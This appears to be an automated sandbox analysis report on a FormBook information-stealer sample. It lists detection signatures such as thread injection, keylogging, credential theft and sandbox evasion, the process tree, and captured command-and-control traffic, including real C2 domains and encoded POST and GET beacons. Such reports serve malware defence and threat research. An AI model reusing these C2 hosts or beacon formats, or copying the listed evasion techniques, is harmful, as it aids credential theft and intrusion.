
Windows Analysis Report
qbSIgCrCgw.exe

Overview

General Information

Sample name: qbSIgCrCgw.exe (renamed because the original name is a hash value)
Original sample name: bb04679008a1ac6bcd8ca7ff7470e0ee72450562fd87be1e0b8111f0e7ef2d76.exe
Analysis ID: 1589092
MD5: 8057aaa332a2045b3acb5040bad45772
SHA1: 224c921be20a4e4c3b627f0dc01bd5c896ca122b
SHA256: bb04679008a1ac6bcd8ca7ff7470e0ee72450562fd87be1e0b8111f0e7ef2d76
Tags: exe, Formbook, user-adrian__luca

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Checks if the current process is being debugged
Connects to several IPs in different countries
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evaded block containing many API calls
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • qbSIgCrCgw.exe (PID: 2340 cmdline: "C:\Users\user\Desktop\qbSIgCrCgw.exe" MD5: 8057AAA332A2045B3ACB5040BAD45772)
    • svchost.exe (PID: 2916 cmdline: "C:\Users\user\Desktop\qbSIgCrCgw.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • WafZCahkNS.exe (PID: 2232 cmdline: "C:\Program Files (x86)\PbKcVySxKkBqlnbtyVEUTzIwhSrPWuVYjgrhZNpAbtlDnEoRwvsHoWRxySkVwr\WafZCahkNS.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • mobsync.exe (PID: 7060 cmdline: "C:\Windows\SysWOW64\mobsync.exe" MD5: F7114D05B442F103BD2D3E20E78A7AA5)
          • WafZCahkNS.exe (PID: 3920 cmdline: "C:\Program Files (x86)\PbKcVySxKkBqlnbtyVEUTzIwhSrPWuVYjgrhZNpAbtlDnEoRwvsHoWRxySkVwr\WafZCahkNS.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 4520 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
00000008.00000002.3900807992.0000000002280000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000006.00000002.3898728526.0000000002A30000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000002.00000002.1668607265.00000000033A0000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000006.00000002.3898911867.0000000002CE0000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000002.00000002.1668177200.0000000000400000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
Source | Rule | Description | Author | Strings
2.2.svchost.exe.400000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
2.2.svchost.exe.400000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |

System Summary

Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Users\user\Desktop\qbSIgCrCgw.exe", CommandLine: "C:\Users\user\Desktop\qbSIgCrCgw.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\qbSIgCrCgw.exe", ParentImage: C:\Users\user\Desktop\qbSIgCrCgw.exe, ParentProcessId: 2340, ParentProcessName: qbSIgCrCgw.exe, ProcessCommandLine: "C:\Users\user\Desktop\qbSIgCrCgw.exe", ProcessId: 2916, ProcessName: svchost.exe
Source: Process started | Author: vburov | Data: Command: "C:\Users\user\Desktop\qbSIgCrCgw.exe", CommandLine: "C:\Users\user\Desktop\qbSIgCrCgw.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\qbSIgCrCgw.exe", ParentImage: C:\Users\user\Desktop\qbSIgCrCgw.exe, ParentProcessId: 2340, ParentProcessName: qbSIgCrCgw.exe, ProcessCommandLine: "C:\Users\user\Desktop\qbSIgCrCgw.exe", ProcessId: 2916, ProcessName: svchost.exe

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-01-11T09:27:38.335404+0100 | 2856318 | 1 | A Network Trojan was detected | 192.168.2.8 | 49714 | 103.224.182.242 | 80 | TCP


AV Detection

Source: http://www.aballanet.cat/6xrr/?DzLTc=HxJAUmNG5a+243k7lB56qNhkSq7m2edDyQfNvKnIMmllTqWhJmPDYD6FfyD5P2YCiK6XZxIiPJwBP5cvXMaBQY2hj09WsNhqz7jh3pjJtHZ6ivVVWaE+CFUoLu/IsL675g==&m8=urJ0WtmP0FPTTB | Avira URL Cloud: Label: malware
Source: http://www.aballanet.cat/6xrr/ | Avira URL Cloud: Label: malware
Source: http://aballanet.cat/6xrr/?DzLTc=HxJAUmNG5a | Avira URL Cloud: Label: malware
Source: qbSIgCrCgw.exe | ReversingLabs: Detection: 75%
Source: qbSIgCrCgw.exe | Virustotal: Detection: 68%
Source: Yara match | File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000008.00000002.3900807992.0000000002280000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.3898728526.0000000002A30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.1668607265.00000000033A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.3898911867.0000000002CE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.1668177200.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.3899007570.0000000002D80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.1669021668.0000000005A00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.3900792299.0000000004940000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: qbSIgCrCgw.exe | Joe Sandbox ML: detected
Source: qbSIgCrCgw.exe | Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: Binary string: mobsync.pdbGCTL source: svchost.exe, 00000002.00000003.1637196101.0000000002E1B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1637295915.0000000002E1A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1637317162.0000000002E31000.00000004.00000020.00020000.00000000.sdmp, WafZCahkNS.exe, 00000004.00000002.3899623920.0000000000E6E000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: WafZCahkNS.exe, 00000004.00000000.1588467968.000000000042E000.00000002.00000001.01000000.00000005.sdmp, WafZCahkNS.exe, 00000008.00000002.3899225250.000000000042E000.00000002.00000001.01000000.00000005.sdmp
                Source: Binary string: wntdll.pdbUGP source: qbSIgCrCgw.exe, 00000000.00000003.1442854618.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, qbSIgCrCgw.exe, 00000000.00000003.1439827599.0000000003610000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1569421603.0000000003100000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1668648304.000000000369E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1571730038.0000000003300000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1668648304.0000000003500000.00000040.00001000.00020000.00000000.sdmp, mobsync.exe, 00000006.00000002.3900326799.0000000004A10000.00000040.00001000.00020000.00000000.sdmp, mobsync.exe, 00000006.00000002.3900326799.0000000004BAE000.00000040.00001000.00020000.00000000.sdmp, mobsync.exe, 00000006.00000003.1675481440.0000000004864000.00000004.00000020.00020000.00000000.sdmp, mobsync.exe, 00000006.00000003.1673465215.00000000046BE000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: qbSIgCrCgw.exe, 00000000.00000003.1442854618.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, qbSIgCrCgw.exe, 00000000.00000003.1439827599.0000000003610000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.1569421603.0000000003100000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1668648304.000000000369E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1571730038.0000000003300000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1668648304.0000000003500000.00000040.00001000.00020000.00000000.sdmp, mobsync.exe, mobsync.exe, 00000006.00000002.3900326799.0000000004A10000.00000040.00001000.00020000.00000000.sdmp, mobsync.exe, 00000006.00000002.3900326799.0000000004BAE000.00000040.00001000.00020000.00000000.sdmp, mobsync.exe, 00000006.00000003.1675481440.0000000004864000.00000004.00000020.00020000.00000000.sdmp, mobsync.exe, 00000006.00000003.1673465215.00000000046BE000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: mobsync.pdb source: svchost.exe, 00000002.00000003.1637196101.0000000002E1B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1637295915.0000000002E1A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1637317162.0000000002E31000.00000004.00000020.00020000.00000000.sdmp, WafZCahkNS.exe, 00000004.00000002.3899623920.0000000000E6E000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: svchost.pdb source: mobsync.exe, 00000006.00000002.3901773244.000000000503C000.00000004.10000000.00040000.00000000.sdmp, mobsync.exe, 00000006.00000002.3899096271.0000000002E29000.00000004.00000020.00020000.00000000.sdmp, WafZCahkNS.exe, 00000008.00000002.3901668653.000000000283C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.1965350475.00000000007EC000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: svchost.pdbUGP source: mobsync.exe, 00000006.00000002.3901773244.000000000503C000.00000004.10000000.00040000.00000000.sdmp, mobsync.exe, 00000006.00000002.3899096271.0000000002E29000.00000004.00000020.00020000.00000000.sdmp, WafZCahkNS.exe, 00000008.00000002.3901668653.000000000283C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.1965350475.00000000007EC000.00000004.80000000.00040000.00000000.sdmp
Source: C:\Users\user\Desktop\qbSIgCrCgw.exe | Code function: 0_2_003F6CA9 GetFileAttributesW,FindFirstFileW,FindClose,0_2_003F6CA9
Source: C:\Users\user\Desktop\qbSIgCrCgw.exe | Code function: 0_2_003F60DD _wcscat,_wcscat,__wsplitpath,FindFirstFileW,DeleteFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,0_2_003F60DD
Source: C:\Users\user\Desktop\qbSIgCrCgw.exe | Code function: 0_2_003F63F9 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,0_2_003F63F9
Source: C:\Users\user\Desktop\qbSIgCrCgw.exe | Code function: 0_2_003FEB60 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_003FEB60
Source: C:\Users\user\Desktop\qbSIgCrCgw.exe | Code function: 0_2_003FF56F FindFirstFileW,FindClose,0_2_003FF56F
Source: C:\Users\user\Desktop\qbSIgCrCgw.exe | Code function: 0_2_003FF5FA FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_003FF5FA
Source: C:\Users\user\Desktop\qbSIgCrCgw.exe | Code function: 0_2_00401B2F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00401B2F
Source: C:\Users\user\Desktop\qbSIgCrCgw.exe | Code function: 0_2_00401C8A SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00401C8A
Source: C:\Users\user\Desktop\qbSIgCrCgw.exe | Code function: 0_2_00401F94 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00401F94
Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 6_2_02A4C560 FindFirstFileW,FindNextFileW,FindClose,6_2_02A4C560
Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 4x nop then xor eax, eax | 6_2_02A39D90
Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 4x nop then mov ebx, 00000004h | 6_2_048604EE

Networking

Source: Network traffic | Suricata IDS: 2856318 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M4 : 192.168.2.8:49714 -> 103.224.182.242:80
Source: DNS query: www.izmirescortg.xyz
Source: DNS query: www.logidant.xyz
Source: DNS query: www.tals.xyz
Source: unknown | Network traffic detected: IP country count 10
Source: Joe Sandbox View | IP Address: 45.141.156.114
Source: Joe Sandbox View | IP Address: 13.248.169.48
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 (14 occurrences)
Source: C:\Users\user\Desktop\qbSIgCrCgw.exe | Code function: 0_2_00404EB5 InternetReadFile,InternetQueryDataAvailable,InternetReadFile,0_2_00404EB5
Source: global traffic | HTTP traffic detected: HTTP/1.1 200 OK | date: Sat, 11 Jan 2025 08:27:38 GMT | server: Apache | set-cookie: __tad=1736584058.5003721; expires=Tue, 09-Jan-2035 08:27:38 GMT; Max-Age=315360000 | vary: Accept-Encoding | content-encoding: gzip | content-length: 576 | content-type: text/html; charset=UTF-8 | connection: close | Data Raw / Data Ascii: [gzip-compressed response body dump omitted]
Source: global traffic | HTTP traffic detected: HTTP/1.1 200 OK | date: Sat, 11 Jan 2025 08:27:40 GMT | server: Apache | set-cookie: __tad=1736584060.1234156; expires=Tue, 09-Jan-2035 08:27:40 GMT; Max-Age=315360000 | vary: Accept-Encoding | content-encoding: gzip | content-length: 576 | content-type: text/html; charset=UTF-8 | connection: close | Data Raw / Data Ascii: [gzip-compressed response body dump omitted]
Source: global traffic | HTTP traffic detected: HTTP/1.1 200 OK | date: Sat, 11 Jan 2025 08:27:43 GMT | server: Apache | set-cookie: __tad=1736584063.7482204; expires=Tue, 09-Jan-2035 08:27:43 GMT; Max-Age=315360000 | vary: Accept-Encoding | content-encoding: gzip | content-length: 576 | content-type: text/html; charset=UTF-8 | connection: close | Data Raw / Data Ascii: [gzip-compressed response body dump omitted]
Source: global traffic | HTTP traffic detected: GET /lnl7/?m8=urJ0WtmP0FPTTB&DzLTc=kAPJ1zL1a1XedmcrdtHAbU+8MxIg1b6JbBGKYGigv+9peDDnEk+ogR7nF5sJltA40tggf7QxXQcZwaMcwHfgZUCCvIMy+6OdADZldWa3Ro5vmyUj0qJuSG5eCoJgas7XnA== HTTP/1.1 | Accept: */* | Accept-Language: en-US | Connection: close | Host: www.izmirescortg.xyz | User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
Source: global traffic | HTTP traffic detected: GET /6xrr/?DzLTc=HxJAUmNG5a+243k7lB56qNhkSq7m2edDyQfNvKnIMmllTqWhJmPDYD6FfyD5P2YCiK6XZxIiPJwBP5cvXMaBQY2hj09WsNhqz7jh3pjJtHZ6ivVVWaE+CFUoLu/IsL675g==&m8=urJ0WtmP0FPTTB HTTP/1.1 | Accept: */* | Accept-Language: en-US | Connection: close | Host: www.aballanet.cat | User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
Source: global traffic | HTTP traffic detected: GET /0mwe/?DzLTc=I6/MvosI1M4GXnAC7bSYGFqrxYdgJTNe9tmkEszzRtOWIwRcIvXs05Ha3jXYoQpxdY5hB0FWQM1VzVFsJbVN45JDeb7ji4WvSMSl4p5VjB9j7uxKBUhToKF7GDp/0AaWeg==&m8=urJ0WtmP0FPTTB HTTP/1.1 | Accept: */* | Accept-Language: en-US | Connection: close | Host: www.madhf.tech | User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
Source: global traffic | HTTP traffic detected: GET /g3h7/?DzLTc=dyqW+SkpLS8uL5dRky9k7MKcOglS/8z1zEHoC4ozp/UuBc9Lrzv6UHKMHP5rOiU//FkNbu8cLS6TGHyjoU1BRvMsWNScFLLtPX2xNM4zETNmxHASFhTRGutFERc3E41rkQ==&m8=urJ0WtmP0FPTTB HTTP/1.1 | Accept: */* | Accept-Language: en-US | Connection: close | Host: www.canadavinreport.site | User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
Source: global traffic | HTTP traffic detected: GET /t322/?DzLTc=FCfXCbowRdQKA3bKzmWhb/MMDIYWCwffvgnpa1jm1l5RPo8GmzCZxrunal2GKioIIi33qnUs85PYplnvRA3XR8V86LXkcIGT0dmKE8rYJBtcLljpCBGaC+nO46fC9uxVPg==&m8=urJ0WtmP0FPTTB HTTP/1.1 | Accept: */* | Accept-Language: en-US | Connection: close | Host: www.yunlekeji.top | User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
Source: global traffic | HTTP traffic detected: GET /iuvu/?DzLTc=4GSi4NjhieA+eby0NKQzTEPCPA5td1TZNopVgGr+MixqN2kv+x7vZ9YkKN38Qwr7I1LnRiqAhNhB07BIn5yne0LzqH+H8Nzlr/8TCrRqA4T6hsg8YSRhr2x7F+rJ6nzbiw==&m8=urJ0WtmP0FPTTB HTTP/1.1 | Accept: */* | Accept-Language: en-US | Connection: close | Host: www.logidant.xyz | User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
Source: global traffic | HTTP traffic detected: GET /36be/?m8=urJ0WtmP0FPTTB&DzLTc=zT+fCPSXWqCfWPgMnoOydtJKsJuCEtGx9/DVuG0pIlquWt59hgdSk8Rx6eVvndf2YPyLwPhL3z2g/EyQU+U7rC5vzNz0ZFCw8d/R3+K3cKRBUeMTJLe+XGej8HjBlTXN1Q== HTTP/1.1 | Accept: */* | Accept-Language: en-US | Connection: close | Host: www.laohub10.net | User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
Source: global traffic | HTTP traffic detected: GET /kf1m/?DzLTc=gD/FPiA75bYZCbZDbB+WsVUzjKMJP+r4HqBHW8I3+Q/3qqcwdH4XqO3fnm/yt4rkfBlpHF229jnZH/lk0nBoXOKBKPZyn2cike7Ub3qNJZbDUNl9s1XUkaYGScVYwZ61FA==&m8=urJ0WtmP0FPTTB HTTP/1.1 | Accept: */* | Accept-Language: en-US | Connection: close | Host: www.zkdamdjj.shop | User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
Source: global traffic | HTTP traffic detected: GET /k1td/?m8=urJ0WtmP0FPTTB&DzLTc=oEMxw+ab8QlEZmTmAbDEuuFmAVWx5xMHQHNpbkBMxCjDr7HlodnZgfFsQKGKkvz/XYzpvPMYep3+sZsYYHcCTHyrYyRaD0W2SHbUYxhUJeAm2Jm3PlTqYYqojkKZ3lrXmQ== HTTP/1.1 | Accept: */* | Accept-Language: en-US | Connection: close | Host: www.tals.xyz | User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
Source: global traffic | HTTP traffic detected: GET /gn26/?DzLTc=fgpTVhEuh+HnR3p0lfNLmVuUqPxSLN4hCHlB5YwrT5j1SjgoO/sQ0W1xqV3uB3iqP4rffdiJ/shc0ougvjbd9MI5QldmEc54Vqz3e9231X82gi2igW+4eDd38X27Ejj4Gw==&m8=urJ0WtmP0FPTTB HTTP/1.1 | Accept: */* | Accept-Language: en-US | Connection: close | Host: www.brightvision.website | User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
Source: global traffic | HTTP traffic detected: GET /an34/?m8=urJ0WtmP0FPTTB&DzLTc=CNTdLyZz4y5GtyaihT4QjOii4vbhvEXfI6qLlcD2dwDay6yy3VddH/MIEeXBPGgw7Dla3BC4dxGnjsgYjSxnMH2Hc8XocnANWTB8FhPTbLNabm+q6O9g6Njbhwnq8CC3Yg== HTTP/1.1 | Accept: */* | Accept-Language: en-US | Connection: close | Host: www.airrelax.shop | User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
Source: global traffic | HTTP traffic detected: GET /zz3m/?DzLTc=p4da2npHVYx4RJTvd9az3TD7+hR5I2wPXRunqm38WzEuQm6NKJG/l1bLZhOfnTn2NFbWxBmCDQqA3K9Xvzl9TW5cdeUdvoi/F++BAfC2g+APWC2NffnCCUzK9ka60xikyw==&m8=urJ0WtmP0FPTTB HTTP/1.1 | Accept: */* | Accept-Language: en-US | Connection: close | Host: www.cstrategy.online | User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
Source: global traffic | DNS traffic detected: DNS query: www.izmirescortg.xyz
Source: global traffic | DNS traffic detected: DNS query: www.aballanet.cat
Source: global traffic | DNS traffic detected: DNS query: www.madhf.tech
Source: global traffic | DNS traffic detected: DNS query: www.canadavinreport.site
Source: global traffic | DNS traffic detected: DNS query: www.yunlekeji.top
Source: global traffic | DNS traffic detected: DNS query: www.logidant.xyz
Source: global traffic | DNS traffic detected: DNS query: www.laohub10.net
Source: global traffic | DNS traffic detected: DNS query: www.zkdamdjj.shop
Source: global traffic | DNS traffic detected: DNS query: www.tals.xyz
Source: global traffic | DNS traffic detected: DNS query: www.brightvision.website
Source: global traffic | DNS traffic detected: DNS query: www.airrelax.shop
Source: global traffic | DNS traffic detected: DNS query: www.cstrategy.online
Source: global traffic | DNS traffic detected: DNS query: www.bloodbalancecaps.shop
                Source: unknown | HTTP traffic detected:
                    POST /6xrr/ HTTP/1.1
                    Accept: */*
                    Accept-Language: en-US
                    Accept-Encoding: gzip, deflate, br
                    Content-Length: 206
                    Connection: close
                    Content-Type: application/x-www-form-urlencoded
                    Cache-Control: max-age=0
                    Host: www.aballanet.cat
                    Origin: http://www.aballanet.cat
                    Referer: http://www.aballanet.cat/6xrr/
                    User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
                    Data Ascii: DzLTc=KzhgXQhB/IGl4lEBpAQCzM9Ta8bp9v1A2XPw38nsOEd5D4DccATbEmSbKEnrE2IN96ChUXIOAbQtGqFFaueReL6p4RoWjJZ594Xp3L/A/2p79M4/TZoPdzlCWvq7jY/A6vp1KYZV6gMRigjZPHCMa0Rrv9+hmZMR4AibYXKPPimXr0DOXg3ATDoEmwRuY0Gum8+aqGY=
                Source: global traffic | HTTP traffic detected:
                    HTTP/1.1 404 Not Found
                    Date: Sat, 11 Jan 2025 08:27:08 GMT
                    Content-Type: text/html
                    Transfer-Encoding: chunked
                    Connection: close
                    Cache-Control: private, no-cache, no-store, must-revalidate, max-age=0
                    Pragma: no-cache
                    cf-cache-status: DYNAMIC
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kVYvWshS%2FLMXhL30KcqVpG4p9%2FSKLE16xMIFoVsN5EjpAGarcV8DF56pCpmAErBIxKRqShDACSqdOIlXT8xKs9fKn9XvuNNXLTjxCceyf7SaXaOmPVN3aPVOGyQIXKec%2BkSid8GPlA%3D%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 900386a28e937ce7-EWR
                    alt-svc: h3=":443"; ma=86400
                    server-timing: cfL4;desc="?proto=TCP&rtt=1816&min_rtt=1816&rtt_var=908&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=380&delivery_rate=0&cwnd=197&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                    Data Ascii: 4d6<!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div styl
                Source: global traffic | HTTP traffic detected:
                    HTTP/1.1 404 Not Found
                    Date: Sat, 11 Jan 2025 08:27:24 GMT
                    Server: Apache
                    Expires: Wed, 11 Jan 1984 05:00:00 GMT
                    Cache-Control: no-cache, must-revalidate, max-age=0
                    Link: <https://aballanet.cat/wp-json/>; rel="https://api.w.org/"
                    Upgrade: h2,h2c
                    Connection: Upgrade, close
                    Transfer-Encoding: chunked
                    Content-Type: text/html; charset=UTF-8
                Source: global traffic | HTTP traffic detected:
                    HTTP/1.1 404 Not Found
                    Date: Sat, 11 Jan 2025 08:27:27 GMT
                    Server: Apache
                    Expires: Wed, 11 Jan 1984 05:00:00 GMT
                    Cache-Control: no-cache, must-revalidate, max-age=0
                    Link: <https://aballanet.cat/wp-json/>; rel="https://api.w.org/"
                    Upgrade: h2,h2c
                    Connection: Upgrade, close
                    Transfer-Encoding: chunked
                    Content-Type: text/html; charset=UTF-8
                Source: global traffic | HTTP traffic detected:
                    HTTP/1.1 404 Not Found
                    Date: Sat, 11 Jan 2025 08:27:29 GMT
                    Server: Apache
                    Expires: Wed, 11 Jan 1984 05:00:00 GMT
                    Cache-Control: no-cache, must-revalidate, max-age=0
                    Link: <https://aballanet.cat/wp-json/>; rel="https://api.w.org/"
                    Upgrade: h2,h2c
                    Connection: Upgrade, close
                    Transfer-Encoding: chunked
                    Content-Type: text/html; charset=UTF-8
                Source: global traffic | HTTP traffic detected:
                    HTTP/1.1 404 Not Found
                    Server: F-WEB
                    Date: Sat, 11 Jan 2025 08:28:05 GMT
                    Content-Type: text/html; charset=UTF-8
                    Content-Length: 910
                    Connection: close
